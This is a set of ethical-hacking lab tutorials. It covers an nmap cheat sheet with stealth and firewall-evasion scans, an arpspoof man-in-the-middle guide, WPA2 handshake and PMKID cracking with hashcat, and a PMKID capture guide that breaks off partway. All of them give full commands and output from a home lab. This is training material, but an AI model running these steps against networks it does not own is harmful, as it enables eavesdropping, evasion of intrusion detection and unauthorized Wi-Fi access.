Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
Nmap done: 1 IP address (1 host up) scanned in 5.84 seconds

The -sn switch is used to to sweep a network without doing any port scans.

nmap -sn 192.168.100.0/24

Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-02 00:02 W. Europe Daylight Time
Nmap scan report for 192.168.100.1
Host is up (0.0010s latency).
Nmap scan report for srv1.online-it.nu (192.168.100.11)
Host is up (0.0020s latency).
Nmap scan report for 192.168.100.13
Host is up (0.0010s latency).
Nmap scan report for srv7.home.local (192.168.100.17)
Host is up (0.0011s latency).
Nmap scan report for 192.168.100.100
Host is up (0.0013s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 10.82 seconds

Banner Grabbing & Service Detection

Description Command Example
Detect OS nmap -O [Target] nmap -O 192.168.100.11
Detect OS & Services nmap -A [Target] nmap -A 192.168.100.11
Detect Services nmap -sV [Target] nmap -sV 192.168.100.11

The -O switch scans for operating system details. This type of scan can be used to identify the operating system of the scanned host and the services the host is running.

nmap -O 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:12 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.00032s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds

Port Scans Types

Description Command Example
Scan a single Port nmap -p [Port] [Target] nmap -p 80 192.168.100.11
Scan a range of ports nmap -p [Port-Port] [Target] nmap -p 20-99 192.168.100.11
Scan the first 100 ports nmap -F [Port] [Target] nmap -F 192.168.100.11
Scan using TCP Handshake nmap -sT [Target] nmap -sT 192.168.100.11
Scan using TCP SYN (Stealth) nmap -sS [Target] nmap -sS 192.168.100.11
Scan UDP port nmap -sU [Target] nmap -sU 192.168.100.11

The -sT switch creates a full TCP handshake with the target. This is considered more accurate than SYN scan but is slower and can be easy detected by firewalls and IDS.

nmap -sT 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:18 W. Europe Daylight Time

Nmap scan report for 192.168.100.11
Host is up (1.0s latency).
Not shown: 986 closed ports
PORT     STATE    SERVICE
25/tcp   filtered smtp
53/tcp   open     domain
88/tcp   open     kerberos-sec
110/tcp  filtered pop3
135/tcp  open     msrpc
139/tcp  open     netbios-ssn
389/tcp  open     ldap
445/tcp  open     microsoft-ds
464/tcp  open     kpasswd5
593/tcp  open     http-rpc-epmap
636/tcp  open     ldapssl
3268/tcp open     globalcatLDAP
3269/tcp open     globalcatLDAPssl
3389/tcp open     ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 219.83 seconds

Analysing the scan in wireshark we can see that the open port is responding to the handshake.

If the port is closed on the host, then the target host will respond with a RST+ACK packets.

The -sS switch sends only a TCP SYN packet and waits for a TCP ACK. If it receives an ACK on the specific probed port then it response with a RST packet, in this way the scan can be undetected by the firewall. If the scanned port is closed on the target host, then target will only respond with a RST packet.

nmap -sS 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:24 W. Europe Daylight Time
Nmap scan report for 192.168.100.11

Host is up (0.0013s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 6.31 seconds

Analysing the packets in wireshark we can see that we first send a SYN packet to the scanned port on the target host, if it port is opened the target will response wit a SYN+ACK packet and we respond back with a RST packet.

If the port is closed on the scanned target the we will get a RST+ACK back.

The -sU switch will scan after UDP ports, UDP is a connectionless protocol, UDP packets dose not have any ACK flag set, the UDP protocol don’t require the reviser to confirm that he revised a UDP packet.

If the there is a firewall enabled on the host or on the network you will get a response back “open|filtered ports” and a list of ports that are blocked by the firewall.

nmap -sU 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 19:58 W. Europe Daylight Time

Nmap scan report for 192.168.100.11
Host is up (0.0016s latency).
Not shown: 997 open|filtered ports
PORT    STATE SERVICE
53/udp  open  domain
123/udp open  ntp
389/udp open  ldap

Nmap done: 1 IP address (1 host up) scanned in 17.27 seconds

If the firewall is disabled then they will be no response back.

Inverse Scans

Description Command Example
Xmas scan nmap -sX [Target] nmap -sX 192.168.100.11
FIN scan nmap -sF [Target] nmap -sF 192.168.100.11
TCP Null scan nmap -sN [Target] nmap -sN 192.168.100.11
ACK scan nmap -sA [Target] nmap -sA 192.168.100.11

The -sX switch is called a Xmas Scan, when you scan a network or a target host with Xmax scan, the xmas scan sends a packet that contains multiple flags, the packet contains the URG, PSH & FIN flags. If the host have closed ports, it will respond with a single RST packet. If the ports are open on the host, then the host will respond as an open ports. Modern operating systems, firewalls and IDS drops this kind of packets if they are properly configured.

We will run the xmax scan against a windows server with firewall enabled.

nmap -sX 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 17:07 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
All 1000 scanned ports on 192.168.100.11 are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 27.62 seconds

Observe the line “All 1000 scanned ports on 192.168.100.11 are open|filtered” the output is showing that all scanned ports are “open|filtered”. This means that the firewall are enabled on the target host.

Lets try the same scan but this time we will disable the firewall on our target host.

nmap -sX 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 17:13 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0012s latency).
All 1000 scanned ports on 192.168.100.11 are closed

Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds

Now we get “All 1000 scanned ports on 192.168.100.11 are closed” this indicates that the firewall disabled.

The -sF switch scans the the host with a FIN scan, a FIN scan sends a packet with only the FIN flag set, this allows the packet to pass the firewall. If the port is open you will not get any respond, if the port is closed the target will respond with a RST packet.

When the firewall is enabled on the target the output will have a “open|filtered” response.

nmap -sF 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 17:51 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
All 1000 scanned ports on 192.168.100.11 are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 27.19 seconds

If the firewall is disabled on the target the output will have a “are closed” response.

nmap -sF 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 18:06 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0019s latency).
All 1000 scanned ports on 192.168.100.11 are closed

Nmap done: 1 IP address (1 host up) scanned in 6.29 seconds

The -sN switch will scan the target with a NULL scan, the scan sends a packet without any flags set. if the NULL packet is sent to an open port, the will be no response back. If the NULL packet is sent to a close port, it will respond with a RST packet. This type of scan is easy to detect due that there are no reason to send a TCP packet without a flag.

When using the NULL scan the target will respond similar to the FIN and Xmaz scans.

The -sA switch send a packet with the ACK flag set when scanning a host, when the target receive the ACK packet it will replay with a RST packet. if the port is closed and the firewall is enabled the firewall will block the target host response and there will be no response back.

Observe the output in namp when the firewall is enabled.

nmap -sA 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 19:36 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
All 1000 scanned ports on 192.168.100.11 are filtered

Nmap done: 1 IP address (1 host up) scanned in 27.58 seconds

If the firewall is enabled the “All 1000 scanned ports on 192.168.100.11 are filtered” line will comeback with the “filtered” value. The “filtered” response shows that a firewall is enabled in the system.

Running the same command against a target with a disabled firewall, the output will have a different value.

nmap -sA 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 19:39 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0013s latency).
All 1000 scanned ports on 192.168.100.11 are unfiltered

Nmap done: 1 IP address (1 host up) scanned in 7.23 seconds

The response back on the “All 1000 scanned ports on 192.168.100.11 are unfiltered” is coming back with the “unfiltered” value. The response back means that there are no firewall enabled on the target.

Firewall Evasion

Description Command
Idle zombie scan nmap -sI [zombie] [target]
Use a decoy nmap -D RND: [number] [target]
Fragment packets nmap -f [target]
Specify MTU nmap –mtu [MTU] [target]
Randomize scan order nmap –randomize-hosts [target]
Send bad checksums nmap –badsum [target]
Specify source port nmap –source-port [port] [target]
Spoof MAC Address nmap –spoof-mac [MAC|0|vendor] [target]

The -sI is called a Idle scan or a zombie scan is a stealth technique, when using the a zombie scan packets revised on the scanned host cant be traced back the sender, all network traffic to the target host are going trough a second host on the network called “zombie”.

For a more detail explanation on how the idle scan work i recommend to read the official nmap documentation at https://nmap.org/book/idlescan.html

The -f switch is used to fragment probes into 8-byte packets, the scan will split the TCP header up to several packet, it is a very effective way to hide thee and make it harder for intrusion detection systems to the detect the scans.

The -D switch is used to hide port scans by using one or more decoys IP address,the network traffic on the scanned host will appear coming from the decoys IP address.

The –source-port switch is used to manually specify the source port number of a probe.

The –-randomize-hosts switch is used to randomize the scanning order of the specified ping sweap or a range scan.

Script Engines

Description Command
Run script nmap –script [script.nse] [target]
Run scripts nmap –script [expression] [target
Run scripts by category nmap –script [cat] [target]
Run multiple scripts categories nmap –script [cat1,cat2,cat3] [target]
Update script database nmap –script-updatedb
Script categories all
discovery
default
auth
external
malware
vuln
intrusive
safe

Useful scans

Find Information about IP address

nmap --script=asn-query,whois,ip-geolocation-maxmind [target]

Detect Heart bleed SSL vulnerability

nmap -sV -p 443 --script=ssl-heartbleed [target]

Scan for DDOS reflection UDP services

nmap –sU –A –PN –n –pU:19,53,123,161 –script=ntp-monlist,dns-recursion,snmp-sysdescr [target]

Scan HTTP Service

Get page titles

nmap --script=http-title [target]

Get HTTP headers

nmap --script=http-headers [target]

Recommended sites

https://highon.coffee/blog/nmap-cheat-sheet/

Conclusion

We have looked into some of the scanning techniques we can use with nmap.

Check out the Ethical Hacking notes for more Kali Linux quick guides.




How To Setup A Man In The Middle Attack Using ARP Poisoning

Man In The Middle Attack (MITM) enables the attacker to eavesdrop and alter the communication between two parties. The attacker is able to redirect the flow of packets from any client on the network to his client. That means that any packet that is sent to or from the victim will go through the attackers client.

In this lab we will show you how to setup a man in the middle attack (MITM) using ARP poisoning . The ARP poisoning attack allows us intercept communications across a network, this allows us to sniff any trafic going from the target machine to the internet or a server on the intranet. Any unencrypted communication will be readable for us.

ARP poisoning takes advantage of the ARP protocol function that lets any device send an ARP replay packets to other devices on the same subnet and force them to update there ARP cache tables with new values. The attack will trick the target to think it is communicating with a new router, but in reality all communication is going through the attacker.

We will use arpspoof which is a utility in Kali Linux that allows us to send a load of unrequested ARP responses to a target machine, telling it that the mac-address of the router has changed from what it was to our mac-address,we will use Wireshark to sniff the network traffic coming from our target client.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Preparation For The Lab

It is recommended that you have you some understanding on how ARP works and how clients communicate over layer 2 on the OSI model before you do the exercise.

For this exercise we want to install two client machines running on Virtualboxor or VMware Workstation Player. We are setting up a attacker client that is running on Kali Linux and a target client running on Windows 7, both clients have IP address on the same LAN.

Client IP Address Gateway
Attacker 172.168.10.60/24 172.168.10.2
Target 172.168.10.70/24 172.168.10.2

Start The ARP Poisoning Attack

Firstly we need to setup IP forwarding on the Kali Linux (attacker) client, open a terminal and setup IP forwarding.

sudo echo 1 > /proc/sys/net/ipv4/ip_forward

Next we want to get our default gateway, the IP address of the router.

sudo ip route

root@GalaxyS9:~# sudo ip route
default via 172.168.10.2 dev eth0 proto static metric 100
172.168.10.0/24 dev eth0 proto kernel scope link src 172.168.10.60 metric 100
root@GalaxyS9:~#

The default route for my lab router is 172.168.10.2

Next we want to to know the name of the interface we want to preform the attack on. We will use the wired connection eth0. Display connected network interfaces with “ifconfig”.

root@GalaxyS9:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.168.10.60  netmask 255.255.255.0  broadcast 172.168.10.255
        inet6 fe80::20c:29ff:fed0:e17a  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:d0:e1:7a  txqueuelen 1000  (Ethernet)
        RX packets 512418  bytes 723638885 (690.1 MiB)
        RX errors 0  dropped 276  overruns 0  frame 0
        TX packets 214518  bytes 14530991 (13.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 254  bytes 25816 (25.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 254  bytes 25816 (25.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 3e:9d:73:0e:ef:85  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@GalaxyS9:~#

Now we can start our attack by starting arpspoof. Type arpspoof -h to display the help menu.

sudo arpspoof -i [Network Interface] -t [Target] -r [Default Gateway] 

sudo arpspoof -i eth0 -t 172.168.10.70 -r 172.168.10.2

The arpspoof utility will now proceed to send a load of unrequested ARP responses to the target, telling it that the address of the router has changed to our address.

root@GalaxyS9:~# sudo arpspoof -i eth0 -t 172.168.10.70 -r 172.168.10.2
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a

We need to keep sending the ARP request all the time the attack is ongoing, because if you stop sending the ARP request eventually the target will figure out which is the right default gateway with the real mac-address.

Now open Wireshark on the Kali Linux client and start sniffing on eth0.

Next open a web browser on the target machine and open your favorite home page, in this example i will open www.facebook.com. Go back to the Kali Linux client and stop the trace. Analyzing the trace will show that the target opened www.facebook.com in his browser.

Conclusion

Always use sites that have SSL encryption and never send sensitive information over public WiFi. Intrusion detection and Intrusion prevention systems is the sysadmins best weapon together with enterprise graded hardware on the network.

Check out the Ethical Hacking notes for more Kali Linux quick guides.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.




How To Crack WPA/WPA2 Hash Using HashCat

How To Crack WPA/WPA2 With HashCat

The tutorial will illustrate how to install and configure HashCat on a Windows client and crack the captured PMKID or .hccap files using a wordlist dictionary attack.

“Hashcat is the self-proclaimed world’s fastest password recovery tool. It had a proprietary code base until 2015, but is now released as free software. Versions are available for Linux, OS X, and Windows and can come in CPU-based or GPU-based variants.”

The WPA2 handshake can be captured on a Linux compatible client like Kali Linux with a supported WiFi card running on VirtualBox. Then converted to the right format depending on the captured method and moved over to the Windows client to be cracked.

Use the guides Capturing WPA2 and Capturing WPA2 PMKID to capture the WPA2 handshake. For this test we will use the famous “Rockyou” wordlist.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Step 1: Download HashCat

Hashcat do not require any installation, it is a portable program it requires you to unpack the downloaded archive.

  1. First you need to download Hashcat binaries from https://hashcat.net/hashcat/
  2. Navigate to the location where you saved the downloaded file, and unzip the file

Step 2: Download Wordlist

They are numerous wordlists out on the web, for this test we are going to use the famous “rockyou”.

  1. Open the hashcat folder on your hard
    drive and create a new folder called “wordlist”
  2. Download the
    rockyou.txt wordlist from this Link.
  3. Save the downloaded file in the new folder
    “wordlist”

Step 3: Prepare Your Captured WPA2 Handshake

Depending on the method you used to capture the handshake you either must format the cap file to 2500 hash-mode or the PMKID file to hashcat 16800 hash-mode .

For how to format the files please see the guides Capturing WPA2 and Capturing WPA2 PMKID.

In this lab we are using a captured PMKID and a pcpa handshake formatted to hashcat readable format. “HonnyP01.hccapx ” and ” HonnyP02.16800″.

I’m using two different home routers from D-Link and Technicolor for this experiment, both WiFi routers are owed by me.

  • The “HonnyP01.hccapx” file is captured from the D-Link router.
  • The ” HonnyP02.16800″ file is captured from the Technicolor router.

Step 4: Start Hashcat

You need to run hashcat in CMD or PowerShell. In this example we will use CMD to execute our commands and crack the handshake.

Open CMD and navigate to the hashcat folder.

C:\>cd hashcat-5.1.0
C:\hashcat-5.1.0>

Type hashcat64 -h to display all options

C:\hashcat-5.1.0>hashcat64 -h

 ===+=============
  1 | CPU
  2 | GPU
  3 | FPGA, DSP, Co-Processor

- [ Workload Profiles ] -

  # | Performance | Runtime | Power Consumption | Desktop Impact
 ===+=============+=========+===================+=================
  1 | Low         |   2 ms  | Low               | Minimal
  2 | Default     |  12 ms  | Economic          | Noticeable
  3 | High        |  96 ms  | High              | Unresponsive
  4 | Nightmare   | 480 ms  | Insane            | Headless

- [ Basic Examples ] -

  Attack-          | Hash- |
  Mode             | Type  | Example command
 ==================+=======+==================================================================
  Wordlist         | $P$   | hashcat -a 0 -m 400 example400.hash example.dict
  Wordlist + Rules | MD5   | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule
  Brute-Force      | MD5   | hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a
  Combinator       | MD5   | hashcat -a 1 -m 0 example0.hash example.dict example.dict

If you still have no idea what just happened, try the following pages:

* https://hashcat.net/wiki/#howtos_videos_papers_articles_etc_in_the_wild
* https://hashcat.net/faq/

C:\hashcat-5.1.0>

Step 5: Crack WPA2

In the First example we will illustrate how to get the password from a converted pcap file “.hccapx”.

Copy your converted file to the hashcat folder, in this example i am copying the file HonnyP01.hccapx to my hashcat folder.

Next we will start hashcat and use the wordlist rockyou, type in the parameters below in CMD.

C:\hashcat-5.1.0>hashcat64 -m 2500 -w3 HonnyP01.hccapx "wordlist\rockyou.txt"

  • hashcat64 the binary
  • -m 2500 the format type
  • -w 3 workload-profile 3
  • HonnyP01.hccapx the formatted file
  • “wordlist\rockyou.txt” the path to the wordlist

Hashcat will start processing the file, if you are successful the terminal will display the hash and the password.

Watchdog: Temperature abort trigger set to 90c

Dictionary cache hit:
* Filename..: wordlist\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

7005312a9933d3a57065450f0749f210:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
2fed89e93e2cd63175f435db16ca75f0:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password

Here we can see that hashcat was able to match the hash to a password in the wordlist, in this lab the password to the D-Link WiFi is “password”. You can chose to let the application run trough the wordlist or press “q” to quit.

Approaching final keyspace - workload adjusted.


Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-EAPOL-PBKDF2
Hash.Target......: HonnyP01.hccapx
Time.Started.....: Fri Jan 18 20:13:27 2019 (42 secs)
Time.Estimated...: Fri Jan 18 20:14:09 2019 (0 secs)
Guess.Base.......: File (wordlist\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   230.7 kH/s (46.06ms) @ Accel:512 Loops:128 Thr:64 Vec:1
Recovered........: 18/25 (72.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 4734913/14344384 (33.01%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:24-49
Candidates.#1....: $HEX[303531313037353434] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 66c Fan: 44% Util: 97% Core:1949MHz Mem:4006MHz Bus:16

Started: Fri Jan 18 20:13:12 2019
Stopped: Fri Jan 18 20:14:10 2019

C:\hashcat-5.1.0>

You can display the cracked password with the “show” command or by running the same command again, all cracked hashes will be stored in the “hashcat.potfile” in the hashcat folder.

To display the cracked password in CDM type the command bellow.

C:\hashcat-5.1.0>hashcat64 -m 2500 -w3 HonnyP01.hccapx "wordlist\rockyou.txt" --show

C:\hashcat-5.1.0>hashcat64 -m 2500 -w3 HonnyP01.hccapx "wordlist\rockyou.txt" --show
7005312a9933d3a57065450f0749f210:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
2fed89e93e2cd63175f435db16ca75f0:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
fcaf4223879e125e10a272f9234256fe:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
7617ef601966436708eae3ad2c02d295:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
8b5ddfc6bade402e38e2ce023449bf07:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
C:\hashcat-5.1.0>

In the next example we will run the same command except now we use the 16800 mode to run the dictionary attack against formatted PMKID file captured from the Technicolor router.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 HonnyP02.16800 "wordlist\rockyou.txt"

  • hashcat64 the binary
  • -m 16800 the format type
  • -w 3 workload-profile 3
  • HonnyP02.16800 the formatted file
  • “wordlist\rockyou.txt” the path to the wordlist

17a40e5b92e3815f6111554b1c80f4d9*c4ea1d1f7d93*c498808d7d5f*4c656f6e20322e342047487a:adsladsl

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 17a40e5b92e3815f6111554b1c80f4d9*c4ea1d1f7d93*c4988...47487a
Time.Started.....: Fri Jan 18 23:12:55 2019 (27 secs)
Time.Estimated...: Fri Jan 18 23:13:22 2019 (0 secs)
Guess.Base.......: File (wordlist\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   268.6 kH/s (51.75ms) @ Accel:512 Loops:128 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 11008839/14344384 (76.75%)
Rejected.........: 3636039/11008839 (33.03%)
Restore.Point....: 10261572/14344384 (71.54%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: aldohizo123 -> Juelle98
Hardware.Mon.#1..: Temp: 68c Fan: 43% Util: 95% Core:1847MHz Mem:4006MHz Bus:16

Started: Fri Jan 18 23:12:48 2019
Stopped: Fri Jan 18 23:13:24 2019

C:\hashcat-5.1.0>

Here we can see that the cracked password is “adsladsl” for the Technicolor router.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 HonnyP02.16800 "wordlist\rockyou.txt" --show
17a40e5b92e3815f6111554b1c80f4d9*c4ea1d1f7d93*c498808d7d5f*4c656f6e20322e342047487a:adsladsl

C:\hashcat-5.1.0>

Extra: Brute Force Attack And Rule based attack

You can let hashcat brute force the file with the command bellow.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 HonnyP02.16800 ?l?l?l?l?l?l?l?l

Or use ruled base attack.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 -r rules\best64.rule "wordlist\rockyou.txt" 

Conclusion

Your home or office WiFi can be hacked if you are using a weak password, as always a strong and complex password is still the best defense against an attacker.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.




How To Install ALFA AWUS1900 Kali Linux 2018.4

How To Capture WPA/WPA2 PMKID Kali Linux 2018.4

In this guide i will use the new method to capture WPA/WPA2 PMKID.

“This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).

The main difference from existing attacks is that in this attack you do not need to capture a full EAPOL 4-way handshake. The new attack is performed on the RSNIE (Robust Security Network Information Element) of a single EAPOL frame.”

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Step 1: Install Dependencies And Tools

1.1 Install dependence

sudo apt install libcurl4-openssl-dev libpcap0.8-dev zlib1g-dev libssl-dev

1.2 In order to use the new attack you need the following tools:

Download hcxdumptool, hcxtools and hashcat

sudo git clone https://github.com/ZerBea/hcxdumptool.git

sudo git clone https://github.com/ZerBea/hcxtools.git

sudo git clone https://github.com/hashcat/hashcat.git

1.3 Install hcxdumptool

cd hcxdumptool

1.3.a Create the installation

sudo make

1.3.b Start the installation

sudo make install

1.4.a Install hcxtools

cd ..
cd hcxtools/

1.4.b Create the installation 

sudo make

1.4.c Start the installation

sudo make install

1.5.a Install hashcat

cd ..
cd hashcat

1.5.b Create the installation

sudo make

1.5.c Start the installation

sudo make install

Step 2: Configure Network Card

2.1 Set network card in monitor mode

## Set interface down
sudo ip link set wlan0 down
 
## Set monitor mode
sudo iwconfig wlan0 mode monitor
 
## Set interface up
sudo ip link set wlan0 up

2.2 Confirm monitor mode (ALFA AWUS1900)

sudo iwconfig

root@GalaxyS9:~/hashcat# sudo iwconfig
wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.442 GHz  Tx-Power=30 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

root@GalaxyS9:~/hashcat# 

2.3 Kill the wpa_supplicant for wlan0

sudo wpa_cli terminate wlan0

oot@GalaxyS9:~/hashcat# sudo wpa_cli terminate wlan0
Selected interface 'wlan0'
OK
root@GalaxyS9:~/hashcat# 

Step 3: Use Airodump-ng to sniff nearby networks

3.1 Open a new terminal and run airodump-ng to find your target BSSID

sudo airodump-ng --ivs wlan0

## Or dump the capture to a file
sudo airodump-ng wlan0 --ivs --wps -w /root/Desktop/Dump01 --output-format csv

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
84:C9:B2:6A:9E:90  -38       21        3    0   1  130  WPA2 CCMP   PSK  HonnyP01

3.2 Open a new terminal and navigate to the hashcat directory and create a filtermode file with our Target BSSID

## Open hashcat directory
cd hashcat/

## Create the filtermode file and enter the targets BSSID 
## Target BSSID 84:C9:B2:6A:9E:90 ESSID HonnyP01 Chanel 1
## "echo "BSSID">filter.txt"

sudo echo "84C9B26A9E90">filter.txt

Step 4: Use Hcxdumptool To Catch PMKID From The Target

4.1 Lunch Hcxdumptool and write to cap01.pcapng and use the filermode file and only use chanel 5

sudo hcxdumptool -o cap01.pcapng -i wlan0 --filterlist=filter.txt --filtermode=2 --enable_status=1 -c 1

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0
ERRORMAX.................: 100 errors
FILTERLIST...............: 1 entries
MAC CLIENT...............: e804100a061d
MAC ACCESS POINT.........: 18421de033b8 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 64358
ANONCE...................: edcf48118ea4f0cfc15bf88ece2f38cad42b2e7b294f1db5d3288c7e477fb3b5

INFO: cha=3, rx=999, rx(dropped)=55, tx=32, powned=0, err=0

Let the tool run at least 10 minutes and If an AP receives the association request packet and supports sending PMKID you will see a message “FOUND PMKID”

[16:25:48 - 011] 12acf1e762A4 -> 84C9B26A9E90 <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[16:25:48 - 011] 84C9B26A9E90-> 12acf1e762A4 [ASSOCIATIONRESPONSE, SEQUENCE 1416]
[16:25:48 - 011] 84C9B26A9E90-> 12acf1e762A4 [FOUND PMKID]

4.2 Run hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat

sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng

root@GalaxyS9:~/hashcat# sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng

reading from cap01.pcapng
                                                
summary:                                        
--------
file name....................: cap01.pcapng
file type....................: pcapng 1.0
file hardware information....: armv7l
file os information..........: Linux 4.14.79-v7+
